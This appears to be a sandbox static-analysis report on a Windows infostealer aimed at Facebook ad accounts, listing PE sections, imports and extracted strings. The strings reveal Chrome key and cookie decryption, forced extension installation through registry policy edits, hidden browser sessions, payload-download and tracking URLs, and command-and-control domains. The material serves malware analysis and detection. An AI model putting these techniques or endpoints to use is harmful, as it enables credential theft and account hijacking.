Static | ZeroBOX

PE Compile Time

2021-03-31 17:15:08

PDB Path

F:\facebook_svn\trunk\database\Release\DiskScan.pdb

PE Imphash

4f0608b5638c60342069764638589dcf

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00102101 0x00102200 6.55708969641
.yusaewa 0x00104000 0x00000e54 0x00001000 5.44123640377
.yusaewa 0x00105000 0x00001f95 0x00002000 6.04146366667
.yusaewa 0x00107000 0x000002c3 0x00000400 4.4812041108
.yusaewa 0x00108000 0x00000256 0x00000400 4.06572570974
.yusaewa 0x00109000 0x00000f4c 0x00001000 5.69897356861
.yusaewa 0x0010a000 0x00000da2 0x00000e00 5.77946710622
.yusaewa 0x0010b000 0x00000abe 0x00000c00 5.22749731309
.rdata 0x0010c000 0x0002e154 0x0002e200 5.79028406122
.data 0x0013b000 0x00007764 0x00002c00 4.12479314322
.yusaewa 0x00143000 0x00000050 0x00000200 0.0
.rsrc 0x00144000 0x000215c8 0x00021600 6.15711100319
.reloc 0x00166000 0x0000849c 0x00008600 6.63793057825

Resources

Name Offset Size Language Sub-language File type
ZIP 0x00154b50 0x000108f5 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED Zip archive data, at least v1.0 to extract
RT_ICON 0x00144180 0x00010828 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON 0x001549a8 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED data
RT_VERSION 0x001549c0 0x0000018c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED PGP symmetric key encrypted data - Plaintext or unencrypted data
RT_MANIFEST 0x00165448 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x50c050 LocalAlloc
0x50c054 LocalFree
0x50c058 WinExec
0x50c05c GetComputerNameW
0x50c060 GetModuleFileNameA
0x50c064 GetCurrentProcessId
0x50c068 OpenProcess
0x50c06c GetModuleFileNameW
0x50c070 SetLastError
0x50c074 GetCurrentThread
0x50c078 FindResourceW
0x50c080 CopyFileW
0x50c084 SetStdHandle
0x50c094 GetOEMCP
0x50c098 SizeofResource
0x50c09c CreateProcessA
0x50c0a0 LockResource
0x50c0a4 LoadResource
0x50c0a8 FreeLibrary
0x50c0ac GetTickCount
0x50c0b0 TerminateProcess
0x50c0b4 Sleep
0x50c0b8 WaitForSingleObject
0x50c0bc GetProcessHeap
0x50c0c0 HeapAlloc
0x50c0c4 GetLastError
0x50c0c8 GetTempPathA
0x50c0cc CreateDirectoryA
0x50c0d4 GetShortPathNameA
0x50c0d8 LoadLibraryW
0x50c0dc GetProcAddress
0x50c0e0 WideCharToMultiByte
0x50c0e4 MultiByteToWideChar
0x50c0f0 GetCurrentProcess
0x50c0f4 DuplicateHandle
0x50c0f8 CloseHandle
0x50c0fc WriteFile
0x50c100 SetFileTime
0x50c104 SetFilePointer
0x50c108 ReadFile
0x50c10c GetFileType
0x50c110 CreateFileW
0x50c114 CreateDirectoryW
0x50c118 CreateEventW
0x50c120 GetACP
0x50c124 IsValidCodePage
0x50c128 FindNextFileW
0x50c12c FindFirstFileExW
0x50c130 FindClose
0x50c138 GetFileSizeEx
0x50c13c GetConsoleCP
0x50c140 SetFilePointerEx
0x50c144 ReadConsoleW
0x50c148 GetConsoleMode
0x50c14c EnumSystemLocalesW
0x50c150 GetUserDefaultLCID
0x50c154 IsValidLocale
0x50c158 GetCommandLineW
0x50c15c GetCommandLineA
0x50c160 GetStdHandle
0x50c164 ExitProcess
0x50c168 GetModuleHandleExW
0x50c170 ExitThread
0x50c174 CreateThread
0x50c178 LoadLibraryExW
0x50c17c RtlUnwind
0x50c180 RaiseException
0x50c184 GetStringTypeW
0x50c188 GetLocaleInfoW
0x50c18c LCMapStringW
0x50c190 CompareStringW
0x50c194 GetCPInfo
0x50c198 TlsFree
0x50c19c WriteConsoleW
0x50c1a0 TlsSetValue
0x50c1a4 TlsGetValue
0x50c1a8 TlsAlloc
0x50c1ac SwitchToThread
0x50c1b0 DecodePointer
0x50c1b4 EncodePointer
0x50c1b8 InitializeSListHead
0x50c1bc GetStartupInfoW
0x50c1c0 IsDebuggerPresent
0x50c1c4 GetModuleHandleW
0x50c1c8 ResetEvent
0x50c1cc SetEvent
0x50c1e0 FlushFileBuffers
0x50c1e8 MapViewOfFile
0x50c1ec CreateFileMappingW
0x50c1f0 FormatMessageA
0x50c1f4 GetSystemTime
0x50c1fc AreFileApisANSI
0x50c204 HeapCreate
0x50c208 HeapFree
0x50c210 GetFullPathNameW
0x50c214 GetDiskFreeSpaceW
0x50c218 OutputDebugStringA
0x50c21c LockFile
0x50c228 GetFullPathNameA
0x50c22c SetEndOfFile
0x50c230 UnlockFileEx
0x50c234 GetTempPathW
0x50c238 CreateMutexW
0x50c23c GetFileAttributesW
0x50c240 GetCurrentThreadId
0x50c244 UnmapViewOfFile
0x50c248 HeapValidate
0x50c24c HeapSize
0x50c250 FormatMessageW
0x50c254 GetDiskFreeSpaceA
0x50c258 GetFileAttributesA
0x50c260 OutputDebugStringW
0x50c264 FlushViewOfFile
0x50c268 CreateFileA
0x50c26c LoadLibraryA
0x50c274 DeleteFileA
0x50c278 DeleteFileW
0x50c27c HeapReAlloc
0x50c280 GetSystemInfo
0x50c284 HeapCompact
0x50c288 HeapDestroy
0x50c28c UnlockFile
0x50c290 LockFileEx
0x50c294 GetFileSize
Library ADVAPI32.dll:
0x50c008 LookupAccountNameW
0x50c020 InitializeAcl
0x50c024 GetTokenInformation
0x50c028 GetLengthSid
0x50c02c FreeSid
0x50c030 EqualSid
0x50c034 DuplicateToken
0x50c03c AddAccessAllowedAce
0x50c040 AccessCheck
0x50c044 OpenThreadToken
0x50c048 OpenProcessToken
Library SHELL32.dll:
0x50c2a8 ShellExecuteExA
Library ole32.dll:
0x50c2fc CoInitializeEx
0x50c300 CoGetObject
0x50c304 CoUninitialize
Library WININET.dll:
Library NETAPI32.dll:
0x50c2a0 Netbios
Library ntdll.dll:
0x50c2bc NtFreeVirtualMemory
0x50c2c8 RtlAcquirePebLock
0x50c2d0 RtlReleasePebLock
0x50c2d8 RtlCreateHeap
0x50c2dc RtlDestroyHeap
0x50c2e0 RtlAllocateHeap
0x50c2e4 RtlFreeHeap
0x50c2e8 NtClose
0x50c2ec NtOpenKey
0x50c2f0 NtEnumerateValueKey
0x50c2f4 NtQueryValueKey

!This program cannot be run in DOS mode.
`.yusaewaT
`.yusaewa
`.yusaewa
`.yusaewaV
`.yusaewaL
`.yusaewa
`.yusaewa
`.rdata
@.data
.yusaewaP
@.reloc
L$ +L$`
u&8FIu!8FJu
u.8FIu)8FJu$
SPQRVO
T$(8T$7
t$89t$Ht
>F:D$(u
L$l_^3
L$l_^3
r7;N@u
;VDt-9^$u(
VD9^4|
9~T~)ff
</tA<\t=
D$ SVW
s.;N s)
9V`~$3
[0;~`|
W9S`~,3
t@8C+t3
u&9GXt!
;C4sj
Fh;^ v
L$$_^[3
L$4_^[3
ut8^+u
tL8^+uG
uA9~DtY
t*9NLt
;x,v(hT
|z9X4tu
t39xLt
T$,;D$
@$J+D$,
;t$$rE
)|$ tf
L$<_^[3
@<+A ;
\$<u,;
t$4;t$8
T$$;D$,
F4;H$v+hT
D$$u5hT
f+D$Hf
;D$<s(
\$<+H8
T$4+x8
\$H;T$ r
L$@;|$
;T$(}4
;T$(}
D$(GH;
/;L$X}
9\$(~cf
C;\$(|
;G<v4hT
9D$(r%
L$L_^[3
;W,v5hT
L$<_^[3
L$$_^[3
L$,_^[3
D$PVW3
;|$,tlhX
\$LWPht
D$,@_^[
L$P^[3
D$<}$j
@<+C ;
T$4B;T$,r
9|$ t2
u(9ND|#
u9^(t
G<#F(_^[
t$0;t$<v:hT
\$@;\$(
L$t_^[
PFt48S
D$lQWP
D$lQVP
D$l_^3
f9B:vi
L$<9E VW
D$08GQu
\$ 9P0
D$8+D$4PQ
L$l_^3
L$,_^[3
\$09^H
D$H;\$X|
D$ SWQR
8;SVWu|
;Al~"h
D$(98~&
D$4;D$(
L$l_^3
D$8_^[
D$@;\$
f9H }$
D$HSVW
u'9_xu
T$<PQj
D$(_^[
D$(_^[3
t^QPhh
CG;\$$|
\$ 9H0
T$,9P0
@0;L$8uw;
D$89D$
D$\9Q0
L$ 9P0
;t$Pt<
L$d_^[3
F@[_^]
L$$_^[3
F f;G u
<2t#<-t
;s,}7f
B f;G tB
^ _^[]
u(9wxu
PPPPPhD
f;G*}C3
u&9{xu
L$ 9P0
u$9wxu
u!f9_2u
@M:GFt
L$<_^[3
L$\_^3
u"9^xu
FX#D$(
L$$9P0
L$ ;Nl
L$|_^3
C*@;Gl~
L$d_^[3
u/8GIu!8GJu
f;G2s=
\$ F;t$
f;H*}Y
u#9Cxu
L$D_^[3
f!HN_^[
u"9{xu
L$,8HI
u$9qxu
L$t_^[3
u"9wxu
D$ QRP
T$,B;T$$r
L$ PSQ
L$4_^[3
D$$9_$
u"9_xu
up9N8uk
D$H@Pj
D$0+D$
D$$u)f
f;C*}F
9D$ }1f
|$$9x0
L$4_^[3
;L$4|3
9D$(v+
L$|_^[3
D$ ;|$<
G _^[]
T$,9P0
D$49Q0
L$49H0
|$$t-A
xBf;C(t<
D$49Q0
L$d_^[3
L$<F;s
t-;C u
L$D_^[3
D$X9L$8u
u/8FIu!8FJu
f;O4sb3
D$<@Pj
|$(9D$
L$$+D$8;
9L$8~"
u+8D$Hu%
D$X9D$x
L$$;L$(
D$tpUE
u$9Jxu
T$X9P0
L$`9H0
T$4t:;
|$T9P0
|$8f;H2
f;8t?A
D$8I9L$
L$T9P0
D$89D$
D$ ;D$$t2
T$$9H0
O2f9K2
N*f;J*
F(f;B(
\$$;|$(
f;C2sDf
D$$Qh(
T$0B;T$(r
t09YLt
;Gh~Khh
D$XSVW
t%j0SW
D$89Q0
D$49t$L
L$$9D$ }
T$L9H0
t$<9H0
D$@9Q0
|$8tvA
GWVRh`
L$\_^3
T$(9H0
D$,9Q0
L$ 9H0
T$ 9H0
L$d_^[3
F;t$X|
T$09P0
t$D9p0
L$P<tt
|$$9H0
D$ SVW
D$$VPQ
T$09P0
T$09H0
\$,9X0
|$D|>j
T$89H0
T$89H0
L$H9H0
D$89A
P0f;V.}
L$H9H0
D$,9D$ vH
9] t#9Y
L$T_^[3
|$`9C$
u&9{xu
T$l9H0
T$Tf;C*
f;A*}A
(9t$Lt
L$,9H0
|$$9H0
T$,9P0
q@f;A*
t~8FIuy9z
ut9z8uo
@L#J(#B,
t/<C}1
D$ _^[
T$ 9H0
t$Hf9F2
9D$0t1
D$<;D$8
@$ u8j
L$,f;D$ds_
|$8fff
D$$9A u
F,#OH#GL
!|$$!\$(
#L$$#T$(
f;F2s23
9L$ r*hd
N$#T$L#L$P
f#D$Tf
f#D$Hf9D$ u'f
D$`f#D$Tf
#D$`#T$\
D$X;D$l|
A f;FHt
L$l9H0
#L$<#D$
t$\;t$D
#L$0#D$
t$\;t$D
9t$8~K
#T$<#L$
GF;t$8|
T$(f;F*}#
L$h9H0
D$H9Q0
L$H9P0
#O #G$
<Hf+|H
#N #F$
#x@#XD
A$ uQ9r$uL
B0f;A.
@0;8t-A
#AH#QL
@~)j@h
F,uw9D$<tU
T$X9|$<
L$$;|$<
T$89H0
|$,u!;
#$%&'()*+,-.
565.789/
KLMNOGP
.O[\]^
._`abcde.8
fghijjklmmnopqrstuvvvvvvvvwxyz{|}~~
<>td<<u
L$P9L$H
9D$Hv+
L$0Php
9u(t;j
A<#A8Y]
lhos;J
:modeu(
9\$ t.9
u&8^Iu!8^Ju
L$$_^[3
PQQSVW
PH;QDu
PD+QH;U
AH;BDt5
PH;QDtG
JH;HDt
PH;QDt+
AH+B@P
JH+H@Q
AH+B@P
PH;QDtD
P0;Q(t7
A0;B(t7
A0;B4tY
P0;Q(t7
A0;B(t7
A0;B(t7
J0;H(t7
P0;Q4tY
J4;H,u
AP;BTt
A0h GQ
A4h<GQ
A8hLGQ
A<hXGQ
A@hlGQ
ADh|GQ
Ahh$HQ
Alh4HQ
Aph@HQ
AthLHQ
B|hxHQ
HHQhdNQ
tBh,|Q
tBhL|Q
tBhl|Q
tKh,}Q
tKhL}Q
tKhl}Q
tKh,~Q
tKhL~Q
tKhl~Q
|*h@%T
<xt"<Xu!
<xt"<Xu!
9E$WWV
t,WW9}
QQSVWd
tH9] uC
u PWQR
URPQQh`
;t$,v-
UQPXY]Y[
F4_^[]
<ItC<Lt3<Tt#<h
A<lt'<tt
<ItC<Lt3<Tt#<h
A<lt'<tt
Tt)jhZf;
Jjl^f;
V2jx_f;
F2jgYf;
PPPPPPPP
W8^.u>
W8^.u>
<ItM<Lt:<Tt'<h
?<lt <tt
SWt@jU
@s1PVj@W
>Cu2f9V
7ARPRQh
u9jAXf;
u-jAXf;
<xt<Xt
Wj0XPV
SPjdVQ
<at1<rt!<wt
<=upG8
PPPPPWS
PP9E u<PPVWP
u kE$<
t4h-FO
zSSSSj
SSVWh
f9:t!V
QQSVj8j@
NX9^`t1
;V\uYW
u2Vj@h
9C`u99C\t4
u29K\t-
PPPPPPPP
u$h&uQ
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Buffer out of range (provided length greater than buffer size)
Unknown exception
bad cast
bad locale name
generic
iostream
iostream stream error
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
vector<T> too long
invalid string position
string too long
8-oVX]
!wt$Kr!
!wt$Kr!
@=M`kn
in Json::Value::resize(): requires arrayValue
assert json failed
Missing ':' after object member name
Missing ',' or '}' in object declaration
Missing '}' or object member name
Missing ',' or ']' in array declaration
in Json::Value::operator[](ArrayIndex): requires arrayValue
in Json::Value::operator[](int index): index cannot be negative
in Json::Value::operator[](ArrayIndex)const: requires arrayValue
in Json::Value::resolveReference(): requires objectValue
in Json::Value::operator[](int index) const: index cannot be negative
in Json::Value::resolveReference(key, end): requires objectValue
in Json::Value::getMemberNames(), value must be objectValue
in Json::Value::find(key, end, found): requires objectValue or nullValue
in Json::Value::removeMember(): requires objectValue
' is not a number.
Empty escape sequence in string
Bad escape sequence in string
additional six characters expected to parse unicode surrogate pair.
expecting another \u token to begin the second half of a unicode surrogate pair
Bad unicode escape sequence in string: four digits expected.
Bad unicode escape sequence in string: hexadecimal digit expected.
Line %d, Column %d
for detail.
%%.%ug
-Infinity
-1e+9999
Infinity
1e+9999
000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff
Extra non-whitespace after JSON value.
A valid JSON document must be either an array or an object value.
Exceeded stackLimit in readValue().
Syntax error: value, object or array expected.
nfinity
nfinity
Missing ':' after object member name
keylength >= 2^30
Duplicate key: '
Missing ',' or '}' in object declaration
Missing '}' or object member name
Missing ',' or ']' in array declaration
Unable to parse token length
' is not a number.
Empty escape sequence in string
Bad escape sequence in string
additional six characters expected to parse unicode surrogate pair.
expecting another \u token to begin the second half of a unicode surrogate pair
Bad unicode escape sequence in string: four digits expected.
Bad unicode escape sequence in string: hexadecimal digit expected.
Line %d, Column %d
for detail.
indentation
commentStyle
enableYAMLCompatibility
dropNullPlaceholders
useSpecialFloats
precision
commentStyle must be 'All' or 'None'
indentation
commentStyle
enableYAMLCompatibility
dropNullPlaceholders
useSpecialFloats
precision
commentStyle
indentation
enableYAMLCompatibility
dropNullPlaceholders
useSpecialFloats
precision
collectComments
allowComments
strictRoot
allowDroppedNullPlaceholders
allowNumericKeys
allowSingleQuotes
stackLimit
failIfExtra
rejectDupKeys
allowSpecialFloats
collectComments
allowComments
strictRoot
allowDroppedNullPlaceholders
allowNumericKeys
allowSingleQuotes
stackLimit
failIfExtra
rejectDupKeys
allowSpecialFloats
allowComments
strictRoot
allowDroppedNullPlaceholders
allowNumericKeys
allowSingleQuotes
stackLimit
failIfExtra
rejectDupKeys
allowSpecialFloats
collectComments
allowComments
strictRoot
allowDroppedNullPlaceholders
allowNumericKeys
allowSingleQuotes
stackLimit
failIfExtra
rejectDupKeys
allowSpecialFloats
ConstIterator to Iterator should never be allowed.
in Json::Value::duplicateStringValue(): Failed to allocate string value buffer
in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing
in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer
assert json failed
in Json::Value::setComment(): Comments must start with /
assert json failed
assert json failed
Null Value Passed to Value Constructor
assert json failed
assert json failed
in Json::Value::asCString(): requires stringValue
Type is not convertible to string
LargestInt out of Int range
LargestUInt out of Int range
double out of Int range
Value is not convertible to Int.
LargestInt out of UInt range
LargestUInt out of UInt range
double out of UInt range
Value is not convertible to UInt.
LargestUInt out of Int64 range
double out of Int64 range
Value is not convertible to Int64.
LargestInt out of UInt64 range
double out of UInt64 range
Value is not convertible to UInt64.
A valid JSON document must be either an array or an object value.
Exceeded stackLimit in readValue().
Value is not convertible to double.
Syntax error: value, object or array expected.
Value is not convertible to float.
Value is not convertible to bool.
in Json::Value::clear(): requires complex value
deque<T> too long
0123456789-+Ee
0123456789ABCDEFabcdef-+Xx
0123456789ABCDEFabcdef-+XxPp
map/set<T> too long
0123456789abcdef0123456789abcdef
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
>!KK
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
t>!K
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
tt>!
pp|B>>q
aaj_55
UUPx((
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
,4$8'9-6:.6$1#?*XhHpSeA~NrZlE
Sbt\lH
QeFbF~TiKwZ
4$8,9-6'.6$:#?*1hHpXeA~SrZlN
SbE\lHtQeF
F~TbKwZi
$8,4-6'96$:.?*1#HpXhA~SeZlNrSbE
lHt\eF
Q~TbFwZiK
8,4$6'9-$:.6*1#?pXhH~SeAlNrZbE
SHt\lF
QeTbF~ZiKw
Object not Initialized
Data not multiple of Block Size
need dictionary
stream end
file error
stream error
data error
insufficient memory
buffer error
incompatible version
invalid literal/length code
invalid distance code
invalid block type
invalid stored block lengths
too many length or distance symbols
invalid bit length repeat
oversubscribed dynamic bit lengths tree
incomplete dynamic bit lengths tree
oversubscribed literal/length tree
incomplete distance tree
incomplete literal/length tree
oversubscribed distance tree
empty distance tree with lengths
invalid distance code
invalid literal/length code
Qkkbal
-1.1.3
unknown compression method
invalid window size
incorrect header check
need dictionary
incorrect data check
unknown zip result code
Success
Culdn't duplicate handle
Couldn't create/open file
Failed to allocate memory
Error writing to file
File not found in the zipfile
Still more data to unzip
Zipfile is corrupt or not a zipfile
Error reading file
Caller: faulty arguments
Caller: the file had already been partially unzipped
Caller: can only get memory of a memory zipfile
Caller: not enough space allocated for memory zipfile
Caller: there was a previous error
Caller: additions to the zip have already been ended
Caller: mixing creation and opening of zip
Zip-bug: internal initialisation not completed
Zip-bug: trying to seek the unseekable
Zip-bug: the anticipated size turned out wrong
Zip-bug: tried to change mind, but not allowed
Zip-bug: an internal error during flation
DELETE
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
User-Agent
Content-Type
GetModuleFileNameW
FreeLibrary
CloseHandle
GetCommandLineW
GetTempPathA
GetTempPathW
GetTempFileNameA
WaitForSingleObject
GetFileAttributesW
CreateDirectoryW
CreateMutexW
GetLastError
CreateToolhelp32Snapshot
Process32FirstW
OpenProcess
TerminateProcess
Process32NextW
CreateFileA
DeviceIoControl
CreateWaitableTimerW
SetWaitableTimer
GetNativeSystemInfo
GetVersionExW
GetSystemInfo
GetCurrentThreadId
GetEnvironmentVariableW
GetTickCount
DeleteFileA
DeleteFileW
CopyFileA
PeekMessageW
TranslateMessage
DispatchMessageW
PostThreadMessageW
GetMessageW
GetInputState
GetSystemMetrics
GetWindowThreadProcessId
SHGetSpecialFolderPathW
ShellExecuteExW
SHGetPathFromIDListA
SHGetSpecialFolderLocation
URLDownloadToFileW
URLDownloadToFileA
PathFileExistsW
SHGetValueW
SHSetValueW
PathFileExistsA
RegOpenKeyW
RegOpenKeyExW
RegOpenKeyExA
RegQueryValueExW
RegQueryValueExA
RegCreateKeyExA
RegSetValueExA
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExA
CryptUnprotectData
InternetCloseHandle
InternetSetOptionW
InternetConnectA
HttpSendRequestA
InternetOpenA
InternetReadFile
InternetSetOptionA
InternetCrackUrlA
HttpOpenRequestA
InternetQueryDataAvailable
HttpQueryInfoA
HttpAddRequestHeadersA
InternetGetCookieA
([\S]+?)=([^;|^\r|^\n]+)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
HTTP/1.1
(.+?): ([^;|^\r|^\n]+)
Set-Cookies
Set-Cookie: ([^\r|^\n]+)
vector<bool> too long
()$^.*+?[]|\-{},:=!
xdigit
My local test also works
local test failed
\Google\Chrome\User Data\Local State
os_crypt
encrypted_key
RtlGetNtVersionNumbers
RtlGetNtVersionNumbers
Microsoft Windows 8.1
Microsoft Windows 10
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
Microsoft Windows 8
Microsoft Windows Server 2012
Unknow OS
OS Read Error
http\shell\open\command
Chrome
HKEY_CURRENT_USER
SOFTWARE\Google\Chrome
FireFox
HKEY_CURRENT_USER
SOFTWARE\Mozilla\Firefox
FireFox
HKEY_CURRENT_USER
SOFTWARE\Mozilla\Firefox
SOFTWARE\Clients\StartMenuInternet
{"active_bit":false,"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","notifications","privacy",{"searchProvider":"ctcodeinfo.com"},"storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"explicit_host":["http://*/*","https://*/*"],"manifest_permissions":[],"scriptable_host":["http://*/*","https://*/*"]},"commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","notifications","privacy",{"searchProvider":"ctcodeinfo.com"},"storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"explicit_host":["http://*/*","https://*/*"],"manifest_permissions":[],"scriptable_host":["http://*/*","https://*/*"]},"incognito_content_settings":[],"incognito_preferences":{},"inst
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
Mar 31 2021
16:14:51
16:14:51
16:14:51
16:14:51
16:14:51
16:14:51
RiiUjhQ9p5ALGm7z
YarlICNMSLkEk9Hx
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
application/x-www-form-urlencoded;charset=utf-8
http://ngdatas.pw/
http://www.cncode.pw/
0.0.0.0
%d.%d.%d.%d
\Google\Chrome\User Data\
\Secure Preferences
\Google\Chrome\User Data\
\Extensions
ConvertSidToStringSidW
\Google\Chrome\User Data
\js\background.js
6.37.18_0
colgdlijdieibnaccfdcdbpdffofkfeb
cmd.exe /c taskkill /f /im chrome.exe
Default
const mac = '
const channelid ='
const version='
colgdlijdieibnaccfdcdbpdffofkfeb
SOFTWARE\Policies\Google\Chrome\ExtensionInstallWhitelist
SOFTWARE\Policies\Google\Chrome\ExtensionInstallWhitelist
Default
extensions.settings.
colgdlijdieibnaccfdcdbpdffofkfeb
\u003C
extensions
settings
colgdlijdieibnaccfdcdbpdffofkfeb
protection
extensions
settings
colgdlijdieibnaccfdcdbpdffofkfeb
protection
\u003C
protection
super_mac
\Temp\
cghjgasaaz99
\" /s /e /y
xcopy "
--window-position=-50000,-50000
--user-data-dir="
https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
","message":"
","code":"
{"type":"installresult","uid":"
success
err : write reg failed(RegCreateKeyExA)
err : write reg failed(RegSetValueExA)
err : extension dir not found(possible no chrome installed)
err : zip release failed
err : securepref not found
err : parse json failed
err : unknown
","channelid":"
","adminmode":"
","version":"
application/x-www-form-urlencoded;charset=utf-8
http://www.fddnice.pw/
http://www.sokoinfo.pw/
http://www.zzhlike.pw/
/Home/Index/lkdinl
http://
DELETE
The NCBENUM return adapter number is: %d
%02X%02X%02X%02X%02X%02X
RtlGetNtVersionNumbers
SOFTWARE\Clients\StartMenuInternet
http\shell\open\command
RtlGetNtVersionNumbers
Microsoft Windows 8.1
Microsoft Windows 10
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
Microsoft Windows 8
Microsoft Windows Server 2012
Unknow OS
OS Read Error
mutexmutex
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
DELETE
http://www.channelinfo.pw/index.php/Home/Index/getExe
exe_url
exe_name
run_value
country_code
abandon_country
pre_checks
post_checks
subrate
channelid
https://iplogger.org/1rDMq7
https://iplogger.org/1rd8N6
https://iplogger.org/1spuy7
https://iplogger.org/1uS4i7
https://iplogger.org/1uW6i7
https://iplogger.org/1TW3i7
https://iplogger.org/1q6Jt7
https://iplogger.org/1DE477
https://iplogger.org/14Qju7
https://iplogger.org/14ePy7
https://iplogger.org/1UKG97
https://iplogger.org/1O2BH
https://iplogger.org/1OZVH
https://iplogger.org/1OXFG
https://iplogger.org/1rDdM6
https://iplogger.org/1Ka7t7
https://iplogger.org/1OhAG
https://iplogger.org/16ajh7
https://iplogger.org/1XSq97
https://iplogger.org/19iM77
https://iplogger.org/16xjh7
https://iplogger.org/1XJq97
https://iplogger.org/1XKq97
https://iplogger.org/1X8M97
https://iplogger.org/1UpU57
https://iplogger.org/1T79i7
https://iplogger.org/1T89i7
https://iplogger.org/1Uts87
https://iplogger.org/1KyTy7
https://iplogger.org/1yXwr7
https://iplogger.org/1bV787
https://iplogger.org/1b4887
https://iplogger.org/1H3Fa7
https://iplogger.org/1Ghzj7
https://iplogger.org/1Gjzj7
https://iplogger.org/1Gczj7
https://iplogger.org/1Gbzj7
https://iplogger.org/1fHtp7
https://iplogger.org/1x5bg7
https://iplogger.org/1pdxr7
https://iplogger.org/1Pdet7
Exe Param error
os version too low
success
----WebKitFormBoundary
"; filename="
smfile
Content-Disposition: form-data; name="
Content-Type: image/png
----WebKitFormBoundary
file_id
Content-Disposition: form-data; name="
----WebKitFormBoundary
User-Agent
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
----WebKitFormBoundary
multipart/form-data; boundary=
https://sm.ms/api/v2/upload?inajax=1
https://sm.ms/api/v2/upload?inajax=1
----WebKitFormBoundary
"; filename="
Content-Disposition: form-data; name="
Content-Type: image/png
----WebKitFormBoundary
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
User-Agent
----WebKitFormBoundary
multipart/form-data; boundary=
https://prntscr.com/upload.php
https://prntscr.com/upload.php
DELETE
https://www.aol.com
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
https://www.google.com
https://www.google.com/search?q=admob&oq=admob
https://www.bing.com
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept
https://www.facebook.com/bookmarks/pages?ref_type=logout_gear
type:"type_page"
